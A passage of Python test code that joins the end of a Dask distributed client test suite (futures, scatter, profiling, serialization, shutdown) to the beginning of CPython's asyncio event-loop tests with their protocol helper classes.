_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def _test_dynamic_workloads_sync(c, delay):
future = c.submit(_dynamic_workload, 0, delay=delay)
assert future.result(timeout=40) == 52
def test_dynamic_workloads_sync(c):
_test_dynamic_workloads_sync(c, delay=0.02)
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
_test_dynamic_workloads_sync(c, delay="random")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = type("")
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = type("")
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(
loop=loop, scheduler_port=0, dashboard_address=None, silence_logs=False
) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
w = a if future.key in a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing and not b.executing:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
start = time()
while future.status != "finished":
await asyncio.sleep(0.01)
assert time() < start + 1
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster()
async def test_scatter_direct(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
start = time()
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
assert time() < start + 5
await c.close()
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
d = {"a": 1}
result = await c.submit(d.get, "a")
assert result == 1
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop, s, a, b):
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@pytest.mark.asyncio
async def test_dashboard_link_inproc(cleanup):
async with Client(processes=False, asynchronous=True) as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.web
import tornado.httpserver
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
async def test(s, a, b):
import numpy as np
async with Client(
s.address, asynchronous=True, serializers=["dask", "msgpack"]
) as c:
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
test()
@gen_cluster()
async def test_de_serialization(s, a, b):
import numpy as np
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
import numpy as np
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=None) as c:
c.close()
c._repr_html_()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[tokey(fx.key)].priority < s.tasks[tokey(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
def test_no_threads_lingering():
active = dict(threading._active)
assert threading.active_count() < 40, list(active.values())
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*[c.scatter(1, direct=True) for _ in range(5)])
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
start = proc.num_fds()
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Worker(s.address, nthreads=2) as a, Worker(
s.address, nthreads=2
) as b:
async with Client(s.address, asynchronous=True) as c:
await df.sum().persist()
begin = time()
while proc.num_fds() > begin:
await asyncio.sleep(0.01)
assert time() < begin + 5, (start, proc.num_fds())
@pytest.mark.asyncio
async def test_dashboard_link_cluster(cleanup):
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(processes=False, asynchronous=True) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@pytest.mark.asyncio
async def test_shutdown(cleanup):
async with Scheduler(port=0) as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == "closed"
assert w.status == "closed"
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(n_workers=1, asynchronous=True, processes=False) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == "closed"
@pytest.mark.asyncio
async def test_config_inherited_by_subprocess(cleanup):
def f(x):
return dask.config.get("foo") + 1
with dask.config.set(foo=100):
async with LocalCluster(n_workers=1, asynchronous=True, processes=True) as lc:
async with Client(lc, asynchronous=True) as c:
result = await c.submit(f, 1)
assert result == 101
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
def test_async_with(loop):
result = None
client = None
cluster = None
async def f():
async with Client(processes=False, asynchronous=True) as c:
nonlocal result, client, cluster
result = await c.submit(lambda x: x + 1, 10)
client = c
cluster = c.cluster
loop.run_sync(f)
assert result == 11
assert client.status == "closed"
assert cluster.status == "closed"
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
da = pytest.importorskip("dask.array")
async def f():
"""
We wrap this in a function so that the assertions aren't in the
performanace report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(filename=fn):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
data = await f()
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
@pytest.mark.asyncio
async def test_client_gather_semaphor_loop(cleanup):
async with Scheduler(port=0) as s:
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import tempfile
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
